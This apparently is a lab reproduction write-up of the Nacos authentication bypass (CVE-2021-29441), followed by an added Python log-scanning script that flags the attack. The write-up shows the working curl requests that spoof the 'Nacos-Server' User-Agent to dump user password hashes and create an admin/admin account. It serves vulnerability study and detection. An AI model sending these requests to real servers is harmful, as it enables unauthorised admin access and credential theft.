Reproducing the Nacos authentication bypass vulnerability
Preface
https://github.com/alibaba/nacos/issues/4701
https://nvd.nist.gov/vuln/detail/CVE-2021-29441
Reproducing the Alibaba Nacos authentication bypass vulnerability
https://www.freebuf.com/vuls/263845.html
Environment setup
# download the release tarball (the release page URL itself is not the archive)
wget https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.tar.gz
tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz
cd nacos/bin
./startup.sh -m standalone
Open http://ip:8848/nacos/#/login and log in with the default credentials nacos/nacos:
http://10.63.0.14:8848/nacos/#/login
Reproduction log
Step 1: list the current users
http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=100
Step 2: enable authentication
Edit the configuration file conf/application.properties and enable nacos.core.auth.enabled:
ps -ef | grep nacos
kill -9 <nacos-pid>
cat conf/application.properties | grep nacos.core.auth.enabled
nacos.core.auth.enabled=true
Start the server again:
./bin/startup.sh -m standalone
Request the endpoint:
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9'
{"timestamp":"2022-03-07T19:05:12.209+08:00","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/auth/users"}
Step 3: bypass
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
    "pageItems": [
        {
            "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu",
            "username": "nacos"
        }
    ],
    "pageNumber": 1,
    "pagesAvailable": 1,
    "totalCount": 1
}
Step 4: create a user
curl -X POST 'http://10.63.0.14:8848/nacos/v1/auth/users?username=admin&password=admin' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
    "code": 200,
    "data": null,
    "message": "create user ok!"
}
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
    "pageItems": [
        {
            "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu",
            "username": "nacos"
        },
        {
            "password": "$2a$10$FW35Bu3vApps1EmIm105eOuAEP2UBAxXbXtEwIpdxkEMmn/Qvr7de",
            "username": "admin"
        }
    ],
    "pageNumber": 1,
    "pagesAvailable": 1,
    "totalCount": 2
}
# User management: http://10.63.0.14:8848/nacos/#/userManagement
The user we created is also visible there.
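The following script is an added detection example; it is not part of this write-up or of the Nacos project. It shows how the pattern from Steps 3 and 4 looks in the access log of a reverse proxy in front of Nacos and how to flag it: requests to the /nacos/v1/auth/ API whose User-Agent is "Nacos-Server" but whose source is not a known cluster node. Nacos nodes really do send that User-Agent to each other, which is why the whitelist existed, so the rule keys on source address rather than on the header alone; a mutating request (POST user creation) is rated critical, and a rejected attempt (status 4xx, as in Step 2) is kept at a lower severity so a hardened instance still produces an alert trail. The log lines, the cluster range 10.63.0.0/29 and all function names are constructed for the example.

```python
"""Flag requests to the Nacos auth API that spoof the inter-node User-Agent.

Added example (not from the original write-up). Sample log lines and the
cluster address range below are constructed for demonstration.
"""
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# Constructed assumption: addresses of legitimate Nacos cluster members.
# For a standalone instance (as in the write-up) this list would be empty,
# and *any* "Nacos-Server" request to the auth API would be suspicious.
CLUSTER_MEMBERS = [ip_network("10.63.0.0/29")]

AUTH_API_PREFIX = "/nacos/v1/auth/"
SPOOFED_UA = "Nacos-Server"

# Constructed sample entries in combined log format (nginx/Apache style).
SAMPLE_LOG = """\
10.63.0.2 - - [07/Mar/2022:19:05:12 +0800] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 512 "-" "Nacos-Server"
203.0.113.7 - - [07/Mar/2022:19:05:40 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 403 118 "-" "curl/7.79.1"
203.0.113.7 - - [07/Mar/2022:19:06:02 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 210 "-" "Nacos-Server"
203.0.113.7 - - [07/Mar/2022:19:06:30 +0800] "POST /nacos/v1/auth/users?username=admin&password=admin HTTP/1.1" 200 54 "-" "Nacos-Server"
10.63.0.14 - - [07/Mar/2022:19:07:00 +0800] "GET /nacos/ HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Combined log format: src ident user [ts] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass
class Finding:
    src: str
    ts: str
    method: str
    path: str
    status: int
    severity: str
    reason: str


def is_cluster_member(src: str) -> bool:
    """True if the source address belongs to a known Nacos cluster node."""
    try:
        addr = ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in CLUSTER_MEMBERS)


def analyse_line(line: str) -> Optional[Finding]:
    """Return a Finding for a spoofed-UA auth API request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line; a real pipeline would count these
    path = m["path"].split("?", 1)[0]  # drop query string before matching
    if m["ua"] != SPOOFED_UA or not path.startswith(AUTH_API_PREFIX):
        return None
    if is_cluster_member(m["src"]):
        return None  # expected inter-node traffic
    status = int(m["status"])
    if m["method"] in ("POST", "PUT", "DELETE"):
        severity, reason = "critical", "user/role mutation with spoofed server User-Agent"
    else:
        severity, reason = "high", "auth API read with spoofed server User-Agent"
    if status >= 400:
        # The server refused it (patched or hardened instance); still record the attempt.
        severity = "medium"
    return Finding(m["src"], m["ts"], m["method"], path, status, severity, reason)


def scan(log_text: str) -> List[Finding]:
    """Run the rule over every line of an access log and collect the hits."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.severity.upper():8} {f.ts} {f.src} {f.method} {f.path} -> {f.status}: {f.reason}")
```

On the constructed sample the two requests from 203.0.113.7 that carry the Nacos-Server header are flagged (the read as high, the user creation as critical), while the curl request that was correctly refused with 403 and the genuine inter-node call from 10.63.0.2 are not. Pointing `scan` at a real proxy log only requires that the log use the combined format assumed by `LOG_RE`.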
That's it!